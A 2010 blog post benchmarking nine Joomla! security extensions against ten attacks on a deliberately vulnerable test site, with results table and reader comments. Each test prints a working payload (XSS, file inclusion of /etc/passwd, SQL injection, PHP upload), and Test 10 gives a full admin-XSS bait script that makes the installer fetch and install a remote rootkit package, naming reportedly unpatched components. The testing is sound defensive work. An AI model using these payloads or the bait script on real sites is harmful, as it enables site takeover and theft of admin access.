Monday, 20 December 2010 00:00

After having a couple different people ask me which Joomla! security extension I recommend, and having no real answer, I figured the best way was to simply try each one against various security risks and see which vectors are detected. This test should not be considered conclusive, and is not meant to endorse or defame any particular extension.

Tests

Many of the tests were devised from vulnerabilities that I have personally discovered, mostly due to me still having the old vulnerable versions lingering in my Downloads folder. Some are derived from other researchers' work, most notably YEHG (their double-nibble core reflective XSS became one of the tests). I even included a test with an undisclosed, unpatched vulnerability, in case any of the solutions were basing their scanning technique on known vulnerabilities or blacklists.

  1. Malicious User-Agent
  2. Persistent XSS
  3. Persistent XSS via BBCode
  4. Reflective XSS
  5. File Inclusion
  6. PHP File Upload
  7. SQL Injection
  8. SQL Injection via URI
  9. Cross-site Request Forgery
  10. Rootkit install via XSS/CSRF

Final Results

Environment

Since the purpose of this exercise is to test each extension, and not the site as a whole, I intentionally installed insecure extensions on an unpatched Joomla! 1.5.18 with all defaults left intact. It should be noted that alerts to upgrade or change the defaults from any security extensions involved were ignored for the purposes of this test, and unless changed by the extension the core .htaccess rules were used. PHP was configured with register globals off, magic quotes on, and no open_basedir, mod_security or anything of the sort.* Some extensions** were retested either after anomalous results or by request.

SecureLive requires a "live" site, thus my at-home sandboxed virtualized test environment couldn't be used. A comparable live server was used instead, using similar configurations.

** Anti-Hacker was not configured properly during initial tests; Admin Tools Pro and SecureLive requested retesting.

Contenders

The following security extensions were chosen from both the JED and a few different Google searches, listed in alphabetical order:

  • Admin Tools Pro

    Admin Tools is a Joomla! extensions bundle which not only makes your site administration easier, but also strives to enhance your site's security. Among other things, Admin Tools can notify you of new Joomla! updates and install them, fix your files and directories permissions, perform database maintenance, handle custom URL redirection, create a secure .htaccess file and even includes an advanced Web Application Firewall to prevent most common attacks against your site.

  • Anti-Hacker

    Open Source Anti-Hacker Suite provides an all-in-one security protection for your websites, being able to secure you private data, protect your system files from malicious codes and attacks, and clean infected files.

  • Biziant Sentry

    The goal behind Biziant Sentry is to provide free, open-source technology to monitor the requests sent to your Joomla! site in order to detect malicious attempts to inject code. By matching request parameters to known valid types, Biziant Sentry can determine if a request is malicious and stop the attack immediately.

  • jFireWall

    jFireWall EndPoint Protection is a professional and powerful component with the active protection technology for detection of attacks by hackers, which guarantees reliable protection of your Joomla website.

  • jHackGuard

    jHackGuard is designed by SiteGround to protect Joomla websites from hacking attacks. Just add it to your Joomla and it will be safe against SQL Injections, Remote URL/File Inclusions, Remote Code Executions and XSS Based Attacks.

  • Mighty Defender

    MightyDefender is a powerful security component for Joomla 1.5 that allows you to protect your site from different attacks, such as PHP injections, SQL injections, Flood and sometimes even from spam.

  • NinjaSecurity

    NinjaSecurity is a system plugin that monitors the what is called GPC data. Any incoming data is scanned for specially defined patterns, which you can modify as you want and if it detects these patterns, then any attempts will be blocked and the Hacker will then be banned after the attacking attempt.

  • RSFirewall!

    RSFirewall! is the most advanced Joomla! security service that you can use to protect your Joomla! website from intrusions and hacker attacks. RSFirewall! is backed up by a team of experts that are trained to be always up to date with the latest known vulnerabilities and security for Joomla! updates making RSFirewall! the best choice in keeping your website safe.

  • SecureLive

    SecureLive is an advanced security system designed to seamlessly integrate into a variety of platforms including: Joomla security, WordPress security, Drupal security, and E107 security. With a simple plugin installation and activation, you will immediately begin blocking hackers and seeing reports of the malicious activity on your site. SecureLive goes one step further and reports the hackers to the appropriate authorities.

Please Note: all extension descriptions taken from the vendors' respective web sites and/or their JED listing.


Test 1: Malicious User Agent

Embedding code in the User Agent is one notable tactic used in conjunction with file include vulnerabilities, as Linux-based webservers may echo back the User Agent via /proc/self/environ. This wasn't a test on any particular weakness, just a test to see what each solution would do if it encountered a User Agent laced with code:

<?php echo phpinfo(); ?>'"<h1>

Results:

  • Admin Tools Pro: failed to detect
  • Anti-Hacker: failed to detect
  • Biziant Sentry: 403 Forbidden
  • jFireWall: failed to detect
  • jHackGuard: failed to detect
  • Mighty Defender: failed to detect
  • NinjaSecurity: failed to detect
  • RSFirewall!: 403 Forbidden
  • SecureLive: failed to detect

Test 2: Persistent XSS via K2 v2.3

Okay, Test 1 is based on a hypothetical. Let's get into some "real" tests.

Test 2 is designed to test XSS filtering. Since it's easy to test for < to detect HTML markup, I figured I'd have to be a little more creative than using <script> tags (especially since this is likely the most common method of detecting XSS).

For this test I turned to an XSS vector that is based on partial tags that was discovered in K2 version 2.3. Using "website" field of the K2 comment form (as an anonymous user):

" style="position:absolute;top:0px;left:0px;width:99em;height:99em" onmouseover="location.href=String.fromCharCode(104,116,116,112,58,47,47,106,101,102,102,99,104, 97,110,110,101,108,108,46,99,111,109)

Results:

  • Admin Tools Pro: failed to detect
  • Anti-Hacker: banned IP
  • Biziant Sentry: logged XSS, did not prevent request from succeeding
  • jFireWall: failed to detect
  • jHackGuard: logged XSS, did not prevent request from succeeding
  • Mighty Defender: failed to detect
  • NinjaSecurity: failed to detect
  • RSFirewall!: altered attack to prevent execution
  • SecureLive: failed to detect

Test 3: Persistent XSS via BBCode

This test involves an unpatched, unpublished vulnerability in a popular extension that supports BBCode. I'll leave it as an exercise to the reader to discover which extension I used.*

[img]http://j.png?x'/oNeRrOr="/* [/img] eval( */ eval( String.fromCharCode( 97, 108, 101, 114, 116, 40, 34, 88, 83, 83, 34, 41 /*)*/ ) ) //">

* Those interested in more details can contact me privately.

Results:

  • Admin Tools Pro: failed to detect
  • Anti-Hacker: banned IP
  • Biziant Sentry: refused to allow extension to function regardless of input
  • jFireWall: failed to detect
  • jHackGuard: logged XSS, did not prevent request from succeeding
  • Mighty Defender: failed to detect
  • NinjaSecurity: failed to detect
  • RSFirewall!: altered attack to prevent execution
  • SecureLive: failed to detect

Test 4: Reflective XSS via Core

As disclosed by YEHG:

index.php?option=com_content&view=article&id=26&Itemid=40&%%32%32%%33%65%%33%63%%37%33%%36%33%%37%32%%36%39%%37%30%%37%34%%33%65%%36%31%%36%63%%36%35%%37%32%%37%34%%32%38%%32%66%%35%38%%35%33%%35%33%%32%66%%32%39%%33%63%%32%66%%37%33%%36%33%%37%32%%36%39%%37%30%%37%34%%33%65=%%32%32%%33%65%%33%63%%37%33%%36%33%%37%32%%36%39%%37%30%%37%34%%33%65%%36%31%%36%63%%36%35%%37%32%%37%34%%32%38%%32%66%%35%38%%35%33%%35%33%%32%66%%32%39%%33%63%%32%66%%37%33%%36%33%%37%32%%36%39%%37%30%%37%34%%33%65

Results:

  • Admin Tools Pro: failed to detect
  • Anti-Hacker: failed to detect
  • Biziant Sentry: failed to detect
  • jFireWall: banned IP
  • jHackGuard: "Illegal key characters in global data" error page
  • Mighty Defender: failed to detect
  • NinjaSecurity: failed to detect
  • RSFirewall!: 403 Forbidden
  • SecureLive: banned IP

Test 5: File Inclusion

In February of this year, it was discovered that the "Hello World" component tutorial suffered from a Local File Include vulnerability. Furthermore, although the text of the tutorial was changed, the corresponding downloadable sources remained vulnerable for an additional 6 months.

This file inclusion provided by AceVersions 1.0.1:

?option=com_aceversions&view=../../../../../../../../../../../etc/passwd%00

Results:

  • Admin Tools Pro: failed to detect
  • Anti-Hacker: banned IP
  • Biziant Sentry: 403 Forbidden
  • jFireWall: failed to detect
  • jHackGuard: 500 View Not Found, logged attack
  • Mighty Defender: blocked attack
  • NinjaSecurity: failed to detect
  • RSFirewall!: failed to detect
  • SecureLive: banned IP

Test 6: PHP File Upload

Mosets Tree v2.1.5 and below allowed php code to be uploaded via the listings image field. The point behind this test is not to upload any particular PHP file (like a known shell, e.g., c99), but rather to test if each solution detects the upload of PHP files.

Using this method and the following simple code as a payload:

<?php echo phpinfo(); ?><script>alert(1)</script>

Results:

  • Admin Tools Pro: failed to detect
  • Anti-Hacker: failed to detect
  • Biziant Sentry: failed to detect
  • jFireWall: failed to detect
  • jHackGuard: failed to detect
  • Mighty Defender: blocked attack
  • NinjaSecurity: failed to detect
  • RSFirewall!: "ERROR: GD can only handle JPG, GIF and PNG files!"
  • SecureLive: failed to detect

Test 7: SQL Injection

This exercise is not intended for extracting data (as it would be in real life), just testing if the injection is allowed through.

Again, AceVersions 1.0.1, using Blind SQL Injection:

?option=com_aceversions&view=category&catid=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13 --

Results:

  • Admin Tools Pro: 403 Forbidden
  • Anti-Hacker: banned IP
  • Biziant Sentry: 403 Forbidden
  • jFireWall: banned IP
  • jHackGuard: logged request, altered request to prevent execution
  • Mighty Defender: failed to detect - altered injection rules blocks attack
  • NinjaSecurity: logged request, blocked IP
  • RSFirewall!: failed to detect
  • SecureLive: failed to detect

Test 8: SQL Injection

A number of 3rd party SEF extensions were recently found to be vulnerable to Blind SQL Injection via specially crafted URLs. These vulnerabilities are interesting as they bypass the traditional _REQUEST.

AceSEF 1.5.8 suffered from this injection:

http://target/1')and(if((select(username)from(jos_users)where(gid)like(25))like(0x61646d696e),benchmark(5000000,md5(1)),1)--'

Results:

  • Admin Tools Pro: failed to detect
  • Anti-Hacker: failed to detect
  • Biziant Sentry: allowed with core .htaccess, 404 Not Found using Sentry's .htaccess
  • jFireWall: failed to detect
  • jHackGuard: failed to detect
  • Mighty Defender: failed to detect
  • NinjaSecurity: failed to detect
  • RSFirewall!: failed to detect
  • SecureLive: failed to detect

Test 9: CSRF

CSRF might very well be the hardest attack vector to protect against in cases where extensions do not use Joomla!'s core anti-CSRF tokens (or any other type of nonce). Using this example, by using a form of spear phishing (you know, throwing laced links to admins, hoping to "hit") it's possible to write arbitrary php code to unpatched Mosets Tree installs.

This is one test that I didn't expect many solutions to properly detect - it can be difficult to differentiate between a truly authenticated request and one that is being spoofed in this manner.

Note: I'm giving Admin Tools Pro the benefit of the doubt here - in this particular case, these files could be loaded via other means by the extension itself (so direct access is not absolutely necessary).

Results:

  • Admin Tools Pro: failed to detect, prevents file from being accessed directly via .htaccess
  • Anti-Hacker: failed to detect
  • Biziant Sentry: failed to detect, logs nonce warning
  • jFireWall: failed to detect
  • jHackGuard: failed to detect
  • Mighty Defender: failed to detect
  • NinjaSecurity: failed to detect
  • RSFirewall!: failed to detect, notifies if the altered file is added to watch list
  • SecureLive: failed to detect

Test 10: Malicious XSS to Install a Simple Rootkit

There are tons of extensions vulnerable to reflective XSS in the Administrator interface - the Joomla! Core was even vulnerable for quite a while. What follows is a method to gain Administrator access by duping an unsuspecting admin into opening a link while logged in.

Here's the bait code:

<?php
/**
 * system
 * (k) 2010
 * admin "search" xss bait code
 *
 * post a link to this script somewhere on the site
 * when this page is loaded the referrer is probed for vulnerable components
 * if one is found the attack is loaded into an iframe
 * when the page is loaded the iframe is shown across the whole browser window
 * if admin is logged in, visits your link & mouses over the page just once... win!
 * added bonus if admin has html5 capabilities (yay autofocus/onfocus)
 */
$redirect = 'http://google.com'; // where to go in x seconds
$timeout = 8000; // ms
$system_path = 'http://127.0.0.1/root/system.zip'; // path to com_system rootkit
$r = false; $r = 'http://127.0.0.1/sec2010/index.php'; // set to false to use referrer
$go = false; // if probing later is a success this will be true
$url = ''; // iframe url
if (false == $r) {
  $r = @$_SERVER['HTTP_REFERER']; // get referrer
}
if (!$r) die(); // no referrer
$r = parse_url($r); // parse url
if (!is_array($r)) die(); // not an array? must not have parsed correctly
$target = sprintf(
  "%s://%s%s",
  $r['scheme'],
  $r['host'],
  preg_replace(array('`\/?administrator`', '`index\.php`'), '', $r['path'])
);
// list of components/admin xss
$exploits = array(
  'joomgallery' => 'controller=categories&search=x', // 0day DAY 1
  'phocadownload' => 'view=phocadownloads&search=x', // 0day DAY 2
  'redirect' => 'view=links&filter_search=x', // 0day DAY 3
  'fabrik' => 'c=table&filter_table=x', // 0day DAY 4
  // patched
  'k2' => 'view=items&search=x', // fixed ?
  'community' => 'view=events&search=x', // jomsocial <= 1.8.8
  'comprofiler' => 'task=showField&search=x' // < 1.3.0
);
// event triggers
$triggers = array(
  // html5
  '%22%2fautofocus%2f%2f%2fonfocus%3D%22',
  // hoverjack
  '%22%2fstyle%3d%22position%3Aabsolute%3Btop%3A0px%3Bleft%3A0px%3Bwidth%3A999em%3Bheight%3A999em%3Bz-index%3A99999%22%2fonmouseover%3D%22'
);
// javascript code for installing rootkit
// most (all?) require js code to be in all lower case (damn)
$script = preg_replace(array('`\+`Di', '`\%0[9A]`'), array('%20', ''), urlencode(<<<EOF
(function(){eval('(function(){
  if(document.get\u0045lement\u0042y\u0049d(\'systemxss\'))return;
  var x=false,r=/administrator/,i=document.create\u0045lement(\'iframe\');
  if(r.test(location.href)){
    i.src=\'index.php?option=com_installer\';
    i.set\u0041ttribute(\'id\',\'systemxss\');
    i.set\u0053tyle(\'display\',\'none\');
    document.body.append\u0043hild(i);
    i.add\u0045vent(\'load\',function(e){
      if(x){return;}x=true;
      var d=e.target.content\u0044ocument;
      if(!d){return;}
      var inp=d.get\u0045lement\u0042y\u0049d(\'install_url\');
      inp.value=\'{$system_path}\';
      try{
        var b=inp.parent\u004eode.get\u0045lements\u0042y\u0054ag\u004eame(\'input\')[1];
        b.onclick();
      }
      catch(er){}
    });
  }
})();')})();
EOF
));
// if specific exploit is called, use it
// otherwise try to autodetect
$pattern = "%sadministrator/index.php?option=com_%s&%s%s";
$com = @$_REQUEST['com'];
$go = true;
if (isset($exploits[$com])) {
  $vector = $exploits[$com];
  $url = sprintf($pattern, $target, $com, $vector, $triggers[0].$script.$triggers[1].$script);
}
else {
  $go = false;
  // loop exploits
  foreach ($exploits as $com => $vector) {
    if (false !== @fopen("{$target}components/com_{$com}/{$com}.php", "r")) {
      $url = sprintf($pattern, $target, $com, $vector, $triggers[0].$script.$triggers[1].$script);
      $go = true;
      break;
    }
  }
}
if ('core' == @$_REQUEST['com'] || !$go) {
  // try to load up a known core search xss - yehg
  $com = 'admin';
  $vector = 'task=help&helpsearch=x';
  $url = sprintf($pattern, $target, $com, $vector, $triggers[0].$script.$triggers[1].$script);
}
?><html>
<head>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<style>
div{position:absolute;top:0px;left:0px;z-index:99999;display:none}
body,div{margin:0;padding:0;overflow:hidden}
body,div,iframe{width:100%;height:100%;border:0px}
</style>
</head>
<body>
<div><iframe src="<?php echo $url; ?>"></iframe></div>
<script type="text/javascript">
(function($){$(document).ready(function(){
  $('div').css({opacity:0.01}).css({display:'block'});
  setTimeout(function(){window.top.location.href="<?php echo $redirect; ?>";}, <?php echo $timeout; ?>);
});})(jQuery);
</script>
</body>
</html>

The file referenced above, "system.zip," is a simple Joomla! Component installer that installs a simple authentication plugin that allows an attacker to take further control of the site. Expect sources for this to pop up sometime in the near future.

Results:

  • Admin Tools Pro: install blocked when access to installer set to "nobody"
  • Anti-Hacker: failed to detect
  • Biziant Sentry: failed to detect
  • jFireWall: failed to detect
  • jHackGuard: failed to detect
  • Mighty Defender: failed to detect
  • NinjaSecurity: failed to detect
  • RSFirewall!: 403 Forbidden
  • SecureLive: banned IP

Final Results

Test 1 Test 2 Test 3 Test 4 Test 5 Test 6 Test 7 Test 8 Test 9 Test 10 Total
Total 2 2 3 4 5 2 7 1 1 3  
Admin Tools Pro1 failed failed failed failed failed failed passed failed passed2 passed3 3
Anti-Hacker failed passed passed failed passed failed passed failed failed failed 4
Biziant Sentry passed failed failed failed passed failed passed passed failed failed 4
jFireWall failed failed failed passed failed failed passed failed failed failed 2
jHackGuard failed failed passed passed passed failed passed failed failed failed 4
Mighty Defender failed failed failed failed passed passed passed4 failed failed failed 3
NinjaSecurity failed failed failed failed failed failed passed failed failed failed 1
RSFirewall! passed passed passed passed failed passed failed failed failed passed 6
SecureLive failed failed failed passed passed failed failed failed failed passed 3

Notes:

  1. Security tools are secondary in Admin Tools Pro - thus this solution fails tests that it was not designed to prevent in the first place (namely, XSS).
  2. Admin Tools Pro is getting the benefit of the doubt on this one.
  3. Admin Tools Pro must be configured to lock down com_installer to pass this test.
  4. Default SQL Injection rules did not block attack - reconfigured rules prevents attack.

Conclusion

I think it's readily apparent at this point that no extension passed this test 100%, though I didn't really help things by using known-insecure extensions and an out of date Joomla! install. That said, I figured it was important to note a few things:

  • RSFirewall! performed extremely well, though RSJoomla! was not at all interested in taking part in this exercise. I feel I must apologize for any affrontery caused by comments made by myself and others on Twitter. So RSJoomla!, if you're reading this - I'm sorry and I eat my words.
  • Jeff from SecureLive and Nicholas from Admin Tools Pro must be commended for their proactive stances to this test. Admin Tools Pro underwent some code changes, and Securelive added new rules to their scanning technology immediately after receiving the results.
  • Konstantin from Mighty Extensions was the only vendor to point out that none of the tests attempted to spread spam. He was the only vendor to suggest improvements to this test, and for that I not only thank him, but have ideas for next year's test!

Hopefully, this exercise has brought some attention to areas where each extension can improve in order for the Joomla! community to become safer than before. I'm planning on doing this again next year, so only time will tell...

Get dedicated hosting at Network Solutions!
 
Comments (15)
1 Monday, 20 December 2010 08:37
mandville
expect this to be a well linked post
2 Wednesday, 22 December 2010 06:45
nahrafqifahs
Nice!
3 Wednesday, 22 December 2010 18:56
betweenbrain
Thanks Jeff! This is really useful information. It will be very interesting to see how these Contenders test in three or six months from now. I hope they all get a 10 out of 10 then.
4 Thursday, 23 December 2010 10:52
Jeff Brown (SecureLive)
We have posted our official response to Mr. Channell's results. We disagree with some of the testing methods used and how the tests were performed. We ran similar tests using the proper methods to pass through the Joomla API and Full Server edition and received a 9 out of 10 score. (Which are typical of customer's reports.) We want to thank Mr. Channell for his time and effort and being part of the Security Team.

Read SecureLive's full official response here:
http://www.securelive.net/Typical-Cases/channell-response.html
5 Thursday, 23 December 2010 11:16
Jeff Channell
Jeff,

I hate to argue with your response, but I'll say the same thing publicly that I told you privately: SecureLive did NOT detect the failed tests either time I ran them. I understand you employ scanning on your remote server instead of each individual client, and if you have updated your signatures and scanning technology to detect these attacks, then these tests have served their purpose - but I find it quite dishonest of you to make the claims you have after knowingly failing some of these tests twice.

For example, you claim to have detected Test 2, while my test database for SecureLive clearly shows this was not the case for either the initial test OR the requested retest:

--
-- Dumping data for table `jos_k2_comments`
--

INSERT INTO `jos_k2_comments` (`id`, `itemID`, `userID`, `userName`, `commentDate`, `commentText`, `commentEmail`, `commentURL`, `published`) VALUES
(1, 45, 0, 'test', '2010-12-13 23:11:35', 'haxed haha tooooooooooo shooooooooooooort', 'hax@jeffchannell.com', 'http://" style="position:absolute;top:0px;left:0px;width:99em;height:99em" onmouseover="location.href=String.fromCharCode(104,116,116,112,58,47,47,106,101,102,102,99,104, 97,110,110,101,108,108,46,99,111,109)', 1),
(2, 44, 0, 'jeff', '2010-12-14 01:11:15', 'haha haxxed', 'eeevil@jeffchannell.com', 'http://" style="position:absolute;top:0px;left:0px;width:99em;height:99em" onmouseover="location.href=String.fromCharCode(104,116,116,112,58,47,47,106,101,102,102,99,104, 97,110,110,101,108,108,46,99,111,109)', 1);

Furthermore, there is no confusion as to how any solution "detects" attacks - if the above code sent me on my way to jeffchannell.com, IT FAILED. This has nothing to do with "did it send a 40* error or not," because that was not the point - if the script ran unaltered (as it did during the tests) it was marked as failure. In the example of Test 2, not only was the unaltered script saved to the database and thus executed, but SecureLive's detection system was absolutely silent - no notifications, no IP banning, nothing.
6 Wednesday, 29 December 2010 20:57
dpk
Thanks for doing this research. I hope it instigates more competition and interest in security related extensions and best practices for site owners. The lack of automated internal updates for most extensions and often any sensible, simple, new version release notices is a major drawback for the way it adds risk and maintenance costs to Joomla sites. On th jXtended Comments exploit, why hasn't this been openly addressed? I've seen scripted attacks on it since June.
7 Wednesday, 29 December 2010 21:11
Jeff Channell
dpk, I didn't use jXtended Comments in these tests... is it vulnerable to Test 3?
8 Wednesday, 09 February 2011 16:26
dpk
Not if I just drop your code in there as a non-logged in user. Then I get a 403. This is with CAPTCHA and reCAPTCHA off. If Moovur/Mollom is on, it says it thinks it might be spam and throws up a CAPTCHA screen.
9 Wednesday, 09 February 2011 16:29
dpk
One more thing--in actual use I've never seen jFirewall Lite do anything. It doesn't even log anything. jHackguard has only picked off some spam. Both seem to miss exploit attempts that show up my logs. Early versions of NinjaSecurity seemed to flag almost any kind of input, and later versions don't catch anything.
10 Thursday, 24 March 2011 02:16
Tim24
Great post Jeff. Any idea how mod_security would have done on these tests? It seems kind of redundant to run one of these tools if mod_security is already running.
11 Saturday, 24 December 2011 13:46
BillA
Hey, I was wondering if this test is going to be repeated soon? I am on the fence between RSFirewall and OSE Security Suite.

Thanks.
12 Tuesday, 10 January 2012 13:01
Meredith
We currently lock down our client's Joomla websites at http://greenixhosting.com with a mix of RSFirewall (paid) Admin Tools (free) and GuardXT from OSE's security suite.

With this mix, in addition to our hardened servers, the client has just about all their bases covered.
13 Wednesday, 07 March 2012 20:38
Fabio Perri
Hi Mr. Jeff this "2010 Joomla! Security Extension Comparison" is the best article i ever read on this topic.

We would be grateful if you could make all new tests for the 2012.

From 2010 to 2012 are well past over two years and it would be interesting to know how they would behave today the major of "Joomla Security Extension"

Please Mr. Jeff realizes the "2012 Joomla! Security Extension Comparison"

I hope for your positive response and i wish you good day and good job and very very thanks for this article.

Sincerely Fabio Perri.
14 Monday, 23 July 2012 00:11
nge nge
Hi Jeff,

I'm planning to put one secure extension in my online store website. I don't know which one should I choose between RSFirewall! and Security Suite by OSE. In Security Suite, they wrote can perform advanced protection in Joomla!, VirtueMart, Magento, Drupal and WordPress, etc. Inside this link (http://www.opensource-excellence.com/shop/item/389-ose-security-suite.html ) under performance tab, I saw they already checked all security leak based on "2010 Joomla! Security Extension Comparison". I wish you can make "2012 Joomla Security Extension Comparison". Thank you and appreciate for your effort. :)

Sincerely,
NgeNge
15 Tuesday, 20 August 2013 09:00
Please reconsider!
2013 review Please! or perhaps a paid ebook on security

What's worse than no-wit is half-wit - a common occurence with many devs, hosts, project managers etc. We need a security authority figure to set a high standard.

No more half-witted know-it-alls

C'mon Jeff, you, Nick D, BrianT, Tom C, couple more and we'll have a security brain trust!

Add your comment

Your name:
Comment:
  The word for verification. Lowercase letters only with no spaces.
Word verification:

The Joomla!® name is used under a limited license from Open Source Matters in the United States and other countries. Jeff Channell is not affiliated with or endorsed by Open Source Matters or the Joomla!® Project.

Santorum
Joomla Extensions